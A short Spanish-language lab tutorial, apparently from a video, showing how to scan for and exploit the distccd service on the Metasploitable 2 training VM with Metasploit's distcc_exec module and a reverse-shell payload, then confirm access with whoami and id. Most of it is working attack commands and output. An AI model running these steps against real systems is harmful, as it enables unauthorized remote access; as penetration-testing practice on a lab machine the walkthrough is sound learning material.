
En este video se muestra cómo obtener una shell remota a través de Kali Linux explotando la vulnerabilidad en el servicio distccd del sistema Metasploitable 2.
nmap -sV -p 3632 192.168.56.102
✅ El resultado será el siguiente:
3632/tcp open distccd v1
👉 Por lo tanto, distcc está abierto y es explotable.
msfconsole
use exploit/unix/misc/distcc_exec
show options
Parámetros necesarios:
Opción Valor RHOSTS Metasploitable IP RPORT 3632 PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — la dirección IP de tu Kali Linux
run
🎉 Resultado
Si tiene éxito:
[*] Command shell session opened
Comprobamos la shell:
whoami
uname -a
id